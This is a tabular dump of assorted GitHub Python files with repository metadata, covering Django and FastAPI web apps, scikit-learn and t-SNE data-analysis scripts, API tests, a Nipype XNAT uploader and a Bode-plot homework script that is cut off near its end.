seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
33146570859 | import csv
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.cross_validation import StratifiedKFold
def training_and_testing(X_inputfile, Y_inputfile):
input_features = pd.read_csv(X_inputfile)
X_values = input_features.as_matrix()
target_values = pd.read_csv(Y_inputfile)
Y_values = target_values.as_matrix()
X_train,X_test, Y_train, Y_test = train_test_split(X_values,Y_values, train_size = 0.7)
random_forest_clf = RandomForestRegressor(n_estimators=110, max_features='auto', max_depth=300, oob_score=True, min_impurity_decrease=0.000)
model = random_forest_clf.fit(X_train,Y_train)
print(X_train.shape)
print(model.score(X_train, Y_train))
print(model.score(X_test,Y_test))
predictions = random_forest_clf.predict(X_test)
plt.scatter(list(predictions), list(Y_test))
plt.xlabel("gross")
plt.ylabel("error rate")
plt.legend(loc="upper right")
plt.show()
| alexwaweru/MovieForests | training_and_testing_gross/training_and_testing.py | training_and_testing.py | py | 1,124 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 20,
"usage_type": "call"
},
{
"api_name... |
42542824319 | from django.conf.urls import url
from cart import views
app_name = 'cart'
urlpatterns = [
url(r'^$', views.my_cart, name='my_cart'),
url(r'^add_cart/$', views.add_cart, name='add_cart'),
] | hikaru32/pro_tt | cart/urls.py | urls.py | py | 199 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.conf.urls.url",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cart.views.my_cart",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "cart.views",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.conf.urls... |
26431478290 | import numpy as np
import pandas as pd
mashroom = pd.read_csv('mushroom edibility classification dataset.csv')
mashroom.head()
mashroom.shape
mashroom.isnull().sum()
mashroom_corr = mashroom.corr()
import seaborn as sns
sns.heatmap(mashroom_corr, cmap= 'YlGnBu')
#removing redundant columns that has no distinguishing features
mashroom.drop('veil-type',axis=1,inplace=True) #all the values are 0
mashroom.drop('veil-color',axis=1,inplace=True) #all the values are 2
mashroom.drop('ring-number',axis=1,inplace=True) #all the values are 1
mashroom.drop('Unnamed: 0',axis=1,inplace=True)
mashroom_corr = mashroom.corr()
sns.heatmap(mashroom_corr, cmap= 'YlGnBu')
# handling NaN values
from sklearn.impute import SimpleImputer
impute = SimpleImputer(missing_values = np.nan, strategy = 'mean')
impute.fit(mashroom[['cap-shape']])
mashroom['cap-shape'] = impute.transform(mashroom[['cap-shape']])
impute.fit(mashroom[['cap-color']])
mashroom['cap-color'] = impute.transform(mashroom[['cap-color']])
# mashroom.iloc[302]
mashroom.isnull().sum()
#encode
from sklearn.preprocessing import LabelEncoder
enc = LabelEncoder()
mashroom['class'] = enc.fit_transform(mashroom['class'])
mashroom['bruises'] = enc.fit_transform(mashroom['bruises'])
mashroom.info()
from sklearn.model_selection import train_test_split
mashroom_target = mashroom['class']
mashroom_data = mashroom.drop('class',axis=1)
X_train, X_test, y_train, y_test = train_test_split(mashroom_data, mashroom_target, test_size = 0.25, stratify = mashroom_target, random_state = 0)
#scale
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
print("per-feature minimum after scaling:\n {}".format(
X_train.min(axis=0)))
print("per-feature maximum after scaling:\n {}".format(
X_train.max(axis=0)))
print('label :') # The class is the label
label = pd.DataFrame(mashroom['class'])
label
print('features :')
mashroom_data | Rapheo/Basic-of-ML | Lab_5(data Pre-Processing)/data_preprocessing.py | data_preprocessing.py | py | 2,009 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "seaborn.heatmap",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "seaborn.heatmap",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.impute.SimpleI... |
2884996289 | # coding:utf-8
# @Time : 2020/6/4 14:10
# @Author: Xiawang
# Description:
import time
import pytest
from api_script.open_lagou_com.resume import get_resume_list, get_online_resume, get_attachment_resume, get_contact, \
get_interview, get_obsolete
from utils.util import assert_equal, assert_in
@pytest.mark.incremental
class TestResume:
@pytest.mark.parametrize("stage", [('OBSOLETE'), ('LINK'), ('INTERVIEW'), ('NEW')])
def test_get_resume_list(self, get_access_token, stage):
time.sleep(1.5)
res = get_resume_list(access_token=get_access_token, stage=stage)
assert_equal(0, res.get('code', 1), f'获取{stage}阶段请求成功', te='foxtang')
if len(res.get('data', [])) > 0:
assert_equal(stage, res['data'][0]['stage'], f'获取{stage}的简历用例通过', f'获取{stage}的简历用例失败', 'foxtang')
global resume_id
resume_id = res['data'][0]['resume_id']
def test_get_online_resume(self, get_access_token):
res = get_online_resume(access_token=get_access_token, resume_id=resume_id)
assert_equal(0, res.get('code', 1), f'获取在线简历信息请求成功', te='foxtang')
assert_equal(resume_id, res['data']['resumes']['resume_id'], '获取在线简历用例通过', f'获取在线简历{resume_id}用例失败', 'foxtang')
def test_get_attachment_resume(self, get_access_token):
res = get_attachment_resume(access_token=get_access_token, resume_id=resume_id)
assert_equal(200, res.status_code, f'获取附件简历信息请求成功', te='foxtang')
assert_in(res.headers.get('Attachment-Suffix'), ['pdf', 'doc', 'docx'], '获取附件简历用例通过', f'获取附件简历{resume_id}用例失败',
'foxtang')
def test_get_contact(self, get_access_token):
res = get_contact(access_token=get_access_token, resume_id=resume_id)
assert_equal(0, res.get('code', 1), f'标记初筛请求成功', te='foxtang')
assert_equal(resume_id, int(res['data']['resumeVo']['id']), '标记初筛用例通过', f'标记初筛{resume_id}用例失败', 'foxtang')
def test_get_interview(self, get_access_token):
res = get_interview(access_token=get_access_token, resume_id=resume_id)
assert_equal(0, res.get('code', 1), f'邀约面试请求成功', te='foxtang')
assert_equal(resume_id, int(res['data']['resumeVo']['id']), '邀约面试用例通过', f'邀约面试{resume_id}用例失败', 'foxtang')
def test_get_obsolete(self, get_access_token):
res = get_obsolete(access_token=get_access_token, resume_id=resume_id)
assert_equal(0, res.get('code', 1), f'淘汰候选人请求成功', te='foxtang')
assert_equal(resume_id, int(res['data']['resumeVo']['id']), '淘汰候选人用例通过', f'淘汰候选人{resume_id}用例失败', 'foxtang')
| Ariaxie-1985/aria | tests/test_open_api_lagou_com/test_resume.py | test_resume.py | py | 2,896 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.sleep",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "api_script.open_lagou_com.resume.get_resume_list",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "utils.util.assert_equal",
"line_number": 21,
"usage_type": "call"
},
{
... |
41649203624 | from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, get_object_or_404, Http404
from django.urls import reverse
from app.models import Product, Cart, CartItem, Category
def add_product(request):
if request.method == 'GET':
return render(request, 'add_product.html', {})
if request.method == 'POST':
name = request.POST.get('name')
quantity = request.POST.get('quantity')
try:
Product.objects.create(name=name, quantity=quantity)
return render(request, 'add_product.html', {'error': 'product created successfully'})
except ValueError:
return render(request, 'add_product.html', {'error': 'complete all fields'})
def product_list(request):
if request.method == 'GET':
q = request.GET.get('q')
# p_list = []
# for p in Product.objects.all():
# p_list.append(
# {
# 'name': p.name,
# 'quantity': p.quantity
# }
# )
p_list = Product.objects.all()
if q:
p_list = p_list.filter(name__icontains=q)
cat_list = Category.objects.filter(child__isnull=True)
return render(request, 'product_list.html', {'p_list': p_list, 'cat_list': cat_list})
def product_info(request, pk):
product = get_object_or_404(Product, pk=pk)
return render(request, 'product_info.html', {'product': product})
@login_required
def add_to_cart(request):
if request.method == 'POST':
quantity = request.POST.get('quantity') or '0'
pk = request.POST.get('pk')
user = request.user
cart, created = Cart.objects.get_or_create(user=user, status='open')
product = get_object_or_404(Product, pk=pk)
cart_item, created2 = CartItem.objects.get_or_create(products=product, cart=cart)
cart_item.quantity += int(quantity)
cart_item.save()
return HttpResponseRedirect(reverse('cart'))
def cart(request):
user = request.user
cart_obj = user.carts.filter(status='open')
if cart_obj:
return render(request, 'cart.html', {'cart_items': cart_obj[0].items.all()})
else:
return render(request, 'cart.html', {'error': 'You have any cart.'})
def remove_from_cart(request):
if request.method == 'POST':
pk = request.POST.get('pk')
cart_item = get_object_or_404(CartItem, pk=pk)
cart_item.delete()
return HttpResponseRedirect(reverse('cart'))
def category_view(request, name):
if request.method == 'GET':
category = get_object_or_404(Category, name=name)
if category.child.count() >= 1:
raise Http404()
return render(request, 'category.html', {'p_list': category.product_set.all()})
| arash-ataei-solut/shop-practice | app/views.py | views.py | py | 2,928 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "app.models.Product.objects.create",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "app.models.Product.objects",
"line_number": 17,
"usage_type": "attribute"
},
... |
74069869225 | ## Deprecated - see XNATUpload comment. ##
from nipype.interfaces.base import (
traits, BaseInterfaceInputSpec, TraitedSpec,
BaseInterface, InputMultiPath, File)
import qixnat
class XNATUploadInputSpec(BaseInterfaceInputSpec):
project = traits.Str(mandatory=True, desc='The XNAT project id')
subject = traits.Str(mandatory=True, desc='The XNAT subject name')
session = traits.Str(desc='The XNAT session name')
scan = traits.Either(traits.Int, traits.Str, desc='The XNAT scan name')
reconstruction = traits.Str(desc='The XNAT reconstruction name')
assessor = traits.Str(desc='The XNAT assessor name')
resource = traits.Str(mandatory=True, desc='The XNAT resource name')
inout = traits.Str(desc='The XNAT reconstruction or assessor resource'
' in/out qualifier')
force = traits.Bool(desc='Flag indicating whether to replace an existing'
' XNAT file')
skip_existing = traits.Bool(desc='Flag indicating whether to skip upload'
' to an existing target XNAT file')
in_files = InputMultiPath(File(exists=True), mandatory=True,
desc='The files to upload')
modality = traits.Str(desc="The XNAT scan modality, e.g. 'MR'")
class XNATUploadOutputSpec(TraitedSpec):
xnat_files = traits.List(traits.Str, desc='The XNAT file object labels')
class XNATUpload(BaseInterface):
"""
The ``XNATUpload`` Nipype interface wraps the
:meth:`qixnat.facade.XNAT.upload` method.
"""
input_spec = XNATUploadInputSpec
output_spec = XNATUploadOutputSpec
def _run_interface(self, runtime):
# The upload options.
find_opts = {}
if self.inputs.resource:
find_opts['resource'] = self.inputs.resource
if self.inputs.inout:
find_opts['inout'] = self.inputs.inout
if self.inputs.modality:
find_opts['modality'] = self.inputs.modality
if self.inputs.scan:
find_opts['scan'] = self.inputs.scan
elif self.inputs.reconstruction:
find_opts['reconstruction'] = self.inputs.reconstruction
elif self.inputs.assessor:
find_opts['assessor'] = self.inputs.assessor
upload_opts = {}
if self.inputs.force:
upload_opts['force'] = True
if self.inputs.skip_existing:
upload_opts['skip_existing'] = True
# Upload the files.
with qixnat.connect() as xnat:
# The target XNAT scan resource object.
rsc = xnat.find_or_create(self.inputs.project, self.inputs.subject,
self.inputs.session, **find_opts)
self._xnat_files = xnat.upload(rsc, *self.inputs.in_files,
**upload_opts)
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
if hasattr(self, '_xnat_files'):
outputs['xnat_files'] = self._xnat_files
return outputs
| ohsu-qin/qipipe | qipipe/interfaces/xnat_upload.py | xnat_upload.py | py | 3,087 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nipype.interfaces.base.BaseInterfaceInputSpec",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nipype.interfaces.base.traits.Str",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "nipype.interfaces.base.traits",
"line_number": 10,
"usage_... |
43776692283 | import csv
import re
from functools import lru_cache
from pathlib import Path
from rows.fields import slug
CITY_DATA_FILENAME = Path(__file__).parent / "data" / "municipios.csv"
REGEXP_RS = re.compile("^RIO GRANDE DO SUL (.*)$")
STATE_NAMES = {
"acre": "AC",
"alagoas": "AL",
"amapa": "AP",
"amazonas": "AM",
"bahia": "BA",
"ceara": "CE",
"distrito_federal": "DF",
"espirito_santo": "ES",
"goias": "GO",
"maranhao": "MA",
"mato_grosso": "MT",
"mato_grosso_do_sul": "MS",
"minas_gerais": "MG",
"para": "PA",
"pernambuco": "PE",
"parana": "PR",
"paraiba": "PB",
"piaui": "PI",
"rio_de_janeiro": "RJ",
"rio_grande_do_norte": "RN",
"rio_grande_do_sul": "RS",
"rondonia": "RO",
"roraima": "RR",
"santa_catarina": "SC",
"sao_paulo": "SP",
"sergipe": "SE",
"tocantins": "TO",
}
BLOCK_WORDS = ("da", "das", "de", "do", "dos", "e")
WORD_MAP = {
"thome": "tome",
"thome": "tome",
}
CITY_SPELL_MAP = {
("CE", "itapage"): "itapaje",
("MA", "governador_edson_lobao"): "governador_edison_lobao",
("MG", "brasopolis"): "brazopolis",
("MG", "dona_eusebia"): "dona_euzebia",
("MT", "poxoreo"): "poxoreu",
("PA", "santa_isabel_do_para"): "santa_izabel_do_para",
("PB", "serido"): "junco_do_serido",
("PE", "iguaraci"): "iguaracy",
("RJ", "parati"): "paraty",
("RJ", "trajano_de_morais"): "trajano_de_moraes",
("RN", "assu"): "acu", # Açu
("SC", "passos_de_torres"): "passo_de_torres",
("SC", "picarras"): "balneario_picarras",
("SC", "presidente_castelo_branco"): "presidente_castello_branco",
("SE", "gracho_cardoso"): "graccho_cardoso",
("SP", "florinia"): "florinea",
("SP", "moji_mirim"): "mogi_mirim",
("SP", "sao_luis_do_paraitinga"): "sao_luiz_do_paraitinga",
("TO", "fortaleza_do_tabocao"): "tabocao",
("TO", "sao_valerio_da_natividade"): "sao_valerio",
}
@lru_cache(maxsize=1)
def read_state_codes():
with CITY_DATA_FILENAME.open() as fobj:
return {row["city_ibge_code"][:2]: row["state"] for row in csv.DictReader(fobj)}
@lru_cache(maxsize=5570 * 2)
def city_key(state, city):
state, city = state.upper().strip(), slug(city).replace("sant_ana", "santana")
city = CITY_SPELL_MAP.get((state, city), city)
city = " ".join(
WORD_MAP.get(word, word)
for word in city.split("_")
if word not in BLOCK_WORDS
)
return slug(state + " " + city)
@lru_cache(maxsize=5570 * 2)
def split_state_city(text):
words = text.split()
if len(words[0]) == 2: # State acronym
return words[0], " ".join(words[1:])
else: # This row has full state name
for index, _ in enumerate(words, start=1):
key = slug(" ".join(words[:index]))
if key in STATE_NAMES:
return STATE_NAMES[key], " ".join(words[index:])
raise ValueError(f"Cannot recognize state/city: {text}")
@lru_cache(maxsize=1)
def city_map():
with CITY_DATA_FILENAME.open() as fobj:
reader = csv.DictReader(fobj)
return {city_key(row["state"], row["city"]): row for row in reader}
@lru_cache(maxsize=5570 * 2)
def get_city(state, city):
# TODO: Fix 'Cannot parse city/state:' for:
# 'AUGUSTO SEVERO/RN'
# 'DO SUL/MT'
# 'EMBU/SP'
# 'MUNICIPIO PROVISORIO/DF'
# 'SAO LUIZ DO ANUAA/RR'
result_rs = REGEXP_RS.findall(city)
if result_rs:
state, city = 'RS', result_rs[0]
elif "/" in city:
city2, state2 = city.split("/")
if state and state != state2:
raise ValueError(f"Conflict in state for: {city}/{state}")
city, state = city2, state2
city = city_map().get(city_key(state, city))
if city is None:
raise ValueError(f"City/state {repr(city)}/{repr(state)} not found")
return city["state"], city["city"], city["city_ibge_code"]
STATE_CODES = read_state_codes()
| turicas/autuacoes-ambientais-ibama | autuacoes/cities.py | cities.py | py | 3,944 | python | en | code | 8 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "csv.DictReader",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "functools.lru_cache",
"lin... |
29069087850 | from config import db
from flask import abort, session
from models import Recipe, Ingredient,recipes_schema,recipe_schema, RecipeSchema
#####
def create_recipe(recipe):
name = recipe.get("name")
ingredients = recipe.get("ingredients")
ingredients_list = []
# check if recipe with same name already exists
existing_recipe = Recipe.query.filter_by(name=name).first()
if existing_recipe is not None:
abort(406, f"Recipe {name} already exists")
# add ingredients to recipe
for ingredient_data in ingredients:
ingredient_name = ingredient_data.get("name")
#check if the ingredient exist in the data base
existing_ingredient = Ingredient.query.filter_by(name=ingredient_name).first()
if existing_ingredient is not None:
ingredients_list.append(existing_ingredient)
else:
abort(404, f"Ingredient {ingredient_name} not found, you should created first !")
# create new recipe
new_recipe = Recipe(
name=name,
cookTime=recipe.get("cookTime"),
serving=recipe.get("serving"),
preparation=recipe.get("preparation"),
ingredients = ingredients_list
)
# save recipe to database
db.session.add(new_recipe)
db.session.commit()
return recipe_schema.dump(new_recipe), 201
#as user :list all recipes
def list_all_recipes():
if 'name' in session:
recipes = Recipe.query.all()
return recipes_schema.dump(recipes)
else:
abort(401, f"User Unauthorized")
#list recipes with a particular ingredient
def filter_recipe(ingredient_name):
if 'name' in session:
ingredient = Ingredient.query.filter_by(name=ingredient_name).first()
if ingredient :
recipes = ingredient.recipe
recipe_schema = RecipeSchema(many=True)
return recipe_schema .dump(recipes)
else:
abort (404, f"Ingredient {ingredient_name} not found")
else:
abort(401, f"User Unauthorized") | nor5/welshProject | views/recipes.py | recipes.py | py | 2,064 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.Recipe.query.filter_by",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "models.Recipe.query",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "models.Recipe",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "... |
30527541130 | import random
import string
from fastapi import HTTPException
from passlib.context import CryptContext
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm import Session
from starlette import status
from . import models, schemas
def get_user(db: Session, user_id: int):
return db.query(models.User).filter(models.User.id == user_id).first()
def get_user_by_username(db: Session, username: str):
return db.query(models.User).filter(models.User.username == username).first()
def get_users(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.User).offset(skip).limit(limit).all()
def delete_user(db: Session, user: schemas.UserDelete):
try:
db.query(models.User).filter(models.User.username == user.username).delete()
db.commit()
return True
except Exception:
return False
def create_user(db: Session, user: schemas.UserCreate, is_super=False):
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
hashed_password = pwd_context.hash(user.password)
db_user = models.User(username=user.username, hashed_password=hashed_password, is_super=is_super)
db.add(db_user)
try:
db.commit()
db.refresh(db_user)
return db_user
except IntegrityError:
credentials_exception = HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail="User already created",
headers={"WWW-Authenticate": "Bearer"},
)
raise credentials_exception
def get_client(db: Session, key: str, uuid: str = None):
if key and uuid:
return db.query(models.Clients).filter((models.Clients.key == key) &
(models.Clients.uuid == uuid)).first()
elif key:
return db.query(models.Clients).filter(models.Clients.key == key).first()
else:
return db.query(models.Clients).filter(models.Clients.uuid == uuid).first()
def get_clients(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.Clients).offset(skip).limit(limit).all()
def delete_client(db: Session, client_id: int):
try:
db.query(models.Clients).filter(models.Clients.id == client_id).delete()
db.commit()
return True
except Exception:
return False
def create_client(db: Session, user_id: int):
key = ''.join((random.choice(string.ascii_letters.upper()) for x in range(16)))
db_item = models.Clients(creator_id=user_id, key=key)
db.add(db_item)
db.commit()
db.refresh(db_item)
return db_item
| eugenfaust/projectsAPI | sql_app/crud.py | crud.py | py | 2,586 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.orm.Session",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "... |
23634749756 | from sqlalchemy.orm import sessionmaker
from fichero_sql_tablas import Estudiante, create_engine
engine = create_engine('sqlite:///estudiantes1.db', echo=True)
# crear sesion a la bbdd
Session = sessionmaker(bind=engine)
# una vez conectados mediante esta sesion creamos las instancias
session = Session()
# Crear los registros en la db
usuario = Estudiante('juan', 'Juan', 'Perez', 'Lopez', 'Complu')
session.add(usuario)
usuario = Estudiante('ana', 'Ana', 'Perez', 'Lopez', 'Complu')
session.add(usuario)
usuario = Estudiante('Laura', 'Laura', 'Perez', 'Lopez', 'Complu')
session.add(usuario)
#Agregar a la bbdd
session.commit()
| andreagro17/pythonCourseTest | fichero_sql_datos.py | fichero_sql_datos.py | py | 639 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "fichero_sql_tablas.create_engine",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.orm.sessionmaker",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "fichero_sql_tablas.Estudiante",
"line_number": 13,
"usage_type": "call"
},
... |
15267569253 | from django.shortcuts import render,redirect
import book_guide
from book_guide.models import Book_guide
from book_guide.forms import GuideForm
# Create your views here.
def guide(request):
guides=Book_guide.objects.raw('select * from book_guide')
return render(request,"guide/book_guide.html",{'guides':guides})
def add_guide(request):
print(request.FILES)
if request.method=="POST":
forms=GuideForm(request.POST,request.FILES)
forms.save()
return redirect ("/partneracc_addproperty")
else:
guides=GuideForm()
return render(request,'list_property/add_guide.html',{'guides':guides})
def guide_info(request):
if request.method == "POST":
guide_name1 = request.POST['searched']
guides=Book_guide.objects.filter(guide_name__contains=guide_name1)
return render(request,"list_property/update_guide.html",{'guide_name1':guide_name1,'guides': guides})
else:
return render(request,"list_property/update_guide.html",{})
def edit(request,edit):
guides=Book_guide.objects.get(guide_name=edit)
return render (request,"list_property/update_guide.html",{'guides':guides})
def update1(request,guide_name):
print(request.POST)
guides=Book_guide.objects.get(guide_name=guide_name)
#bind data in form with instance of customer
form = GuideForm(request.POST, instance=guides)
if form.is_valid():
try:
form.save()
return redirect("/home")
except:
print("validation false")
return render(request,"list_property/update_guide.html",{'guides':guides})
def search_guide(request):
if request.method == "POST":
searched=request.POST['searched']
venues=Book_guide.objects.filter(guide_address__icontains=searched)
return render(request,'find_guide/searched_guide.html',{'searched':searched,'venues':venues})
else:
return render(request,'find_guide/searched_guide.html',{})
def guide_form(request,p_id):
guides=Book_guide.objects.get(guide_id=p_id)
return render (request,"find_guide/guide_form2.html",{'guides':guides})
| Marinagansi/3rd-sem-project-django | book_guide/views.py | views.py | py | 2,162 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "book_guide.models.Book_guide.objects.raw",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "book_guide.models.Book_guide.objects",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "book_guide.models.Book_guide",
"line_number": 9,
"usage_... |
36549687329 | from setuptools import setup, find_packages
import rbnfrbnf
readme = ""
setup(
name='rbnfrbnf',
version=rbnfrbnf.__version__,
keywords='parser generation, LR parser, efficient, JIT',
description='A best LR parser generator',
long_description=readme,
long_description_content_type='text/markdown',
license='MIT',
python_requires='>=3.6.0',
url='https://github.com/thautwarm/rbnfrbnf',
author='thautwarm, lfkdsk',
author_email='twshere@outlook.com',
packages=find_packages(),
# entry_points={'console_scripts': ['yapypy=yapypy.cmd.cli:python_ex_cli']},
install_requires=['rbnf'],
package_data={'rbnfrbnf': ['bootstrap/*.rbnf']},
platforms='any',
classifiers=[
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython'
],
zip_safe=False)
| thautwarm/rbnfrbnf | setup.py | setup.py | py | 922 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "rbnfrbnf.__version__",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "setuptools.find_packages",
"line_number": 17,
"usage_type": "call"
}
] |
34484792129 | import numpy as np
from DataUtils import DataUtils
import argparse
import os
import torch
from torchvision import datasets, models, transforms
if __name__ == "__main__":
# setting the hyper parameters
parser = argparse.ArgumentParser(description="Analysis Diatoms Research CNR-ISASI")
parser.add_argument('--batch_size', default=256, type=int,
help="Size of the batch")
parser.add_argument('--data_dir', default='../data/Dataset_4',
help="Directory of data. If no data, use \'--download\' flag to download it")
parser.add_argument('--save_dir', default='results',
help="Directory to save the results!")
parser.add_argument('--dataset', default='results',
help="Directory where is the data!")
parser.add_argument('-t', '--testing', action='store_true',
help="Test the trained model on testing dataset")
parser.add_argument('-w', '--weights', default=None,
help="The path of the saved weights. Should be specified when testing")
parser.add_argument('--images_per_class', default=10, help="how many images will be used per class")
parser.add_argument('--classes_training', default=50, help="how many classes there are in the training")
parser.add_argument('--perplexy', default=30, help="TSNE perplexy")
parser.add_argument('--n_iter', default=300, help="TSNE iterations")
args = parser.parse_args()
print(args)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
image_size = 224
data_transforms = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.Grayscale(1),
transforms.ToTensor()])
#transforms.Normalize(_mean, _std)])
data = DataUtils(transformations=data_transforms, device = device, args = args)
dataloaders = data.load_data()
#print(data.train_size, data.valid_size)
X = np.zeros((data.train_size, image_size*image_size))
y = np.zeros((data.train_size))
for i, sample in enumerate(dataloaders['train']):
(inputs, labels),(_,_) = sample
for j in range(len(inputs)):
img = inputs[j]
X[j,:] = img.view(-1, image_size*image_size)
y[j] = labels[j]
#X = X.numpy()
#y = y.numpy()
print(X.shape)
import pandas as pd
feat_cols = ['pixel'+str(i) for i in range(X.shape[1])]
df = pd.DataFrame(X,columns=feat_cols)
df['label'] = y
df['label'] = df['label'].apply(lambda i: str(i))
X, y = None, None
print('Size of the dataframe: {}'.format(df.shape))
import matplotlib.pyplot as plt
rndperm = np.random.permutation(df.shape[0])
# Plot the graph
#plt.gray()
#fig = plt.figure( figsize=(16,7) )
#for i in range(0,15):
# ax = fig.add_subplot(3,5,i+1, title='class: ' + str(df.loc[rndperm[i],'label']) )
# ax.matshow(df.loc[rndperm[i],feat_cols].values.reshape((224,224)).astype(float))
#plt.show()
from sklearn.decomposition import PCA
#pca = PCA(n_components=30)
#pca_result = pca.fit_transform(df[feat_cols].values)
#df['pca-one'] = pca_result[:,0]
#df['pca-two'] = pca_result[:,1]
#df['pca-three'] = pca_result[:,2]
#print('Explained variation per principal component: {}'.format(pca.explained_variance_ratio_))
from ggplot import *
#chart = ggplot( df.loc[rndperm[:3000],:], aes(x='pca-one', y='pca-two', color='label') ) + geom_point(size=75,alpha=0.8) + ggtitle("First and Second Principal Components colored by digit")
#print(chart)
import time
from sklearn.manifold import TSNE
n_sne = 6000
time_start = time.time()
tsne = TSNE(n_components=2, verbose=1, perplexity=int(args.perplexy), n_iter=int(args.n_iter))
tsne_results = tsne.fit_transform(df.loc[rndperm[:n_sne],feat_cols].values)
print('t-SNE done! Time elapsed: {} seconds'.format(time.time()-time_start))
df_tsne = df.loc[rndperm[:n_sne],:].copy()
df_tsne['x-tsne'] = tsne_results[:,0]
df_tsne['y-tsne'] = tsne_results[:,1]
chart = ggplot( df_tsne, aes(x='x-tsne', y='y-tsne', color='label') ) \
+ geom_point(size=70,alpha=0.1) \
+ ggtitle("tSNE dimensions colored by digit")
print(chart) | andouglasjr/ProjectDiatoms | analysis.py | analysis.py | py | 4,569 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "torch.cuda.is_available",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "torch.cu... |
42233326363 | # -*- coding: utf-8 -*-
################################################################
# #
# Seth Cram #
# ECE351-53 #
# Project 9 #
# Due: 3/29/2022 #
# Any other necessary information needed to navigate the file #
#
#
################################################################
import numpy as np
import matplotlib.pyplot as plt
import scipy.signal as sig
import control as con
#default vals
R = 1000
L = 27e-3
C = 100e-9
steps = 1000
#in rad/s (DONT USE 1**3 AS ARG (fails))
w = np.arange(1e3, 1e6+steps, steps)
#TASK 1.1
#prelab eqts
mag = (w/(R*C)) / np.sqrt(w**4 + ((1/(R*C))**2 - 2/(L*C))*(w**2) + (1/(L*C))**2)
phase = np.pi/2 - np.arctan((w/(R*C)) / (-1*(w**2)+(1/(L*C))))
#conv to db and degs
dbMag = 20*np.log10(mag)
degPhase = np.rad2deg(phase)
#need to shift by 180 degs later half to make look better
i=0
while(i < len(w)):
if(degPhase[i] > 90):
degPhase[i] -= 180
i += 1
#TASK 1.2
num = [1/(R*C), 0]
denom = [1, 1/(R*C), 1/(L*C)]
syst = sig.lti(num,denom)
(bodeW, bodeMag, bodePhase) = sig.bode(syst, w)
#PLOTS
font = {'family' : 'normal',
'weight' : 'bold',
'size' : 22}
#plot1:
plt.rc('font', **font)
plt.figure(figsize = (30,30))
plt.subplot(2, 1, 1)
plt.semilogx(w, dbMag)
plt.grid() #add a grid to graph
plt.title('Bode plot for Task 1.1')
plt.ylabel('|H(jw)| (dB)')
#plot2:
plt.subplot(2, 1, 2)
plt.semilogx(w, degPhase)
plt.grid() #add a grid to graph
plt.ylabel('angle of H(jw) (degs)')
plt.xlabel('w (rads/s)')
plt.show() #display figure
#plot1:
plt.rc('font', **font)
plt.figure(figsize = (30,30))
plt.subplot(2, 1, 1)
plt.semilogx(bodeW, bodeMag)
plt.grid() #add a grid to graph
plt.title('Bode plot for Task 1.2')
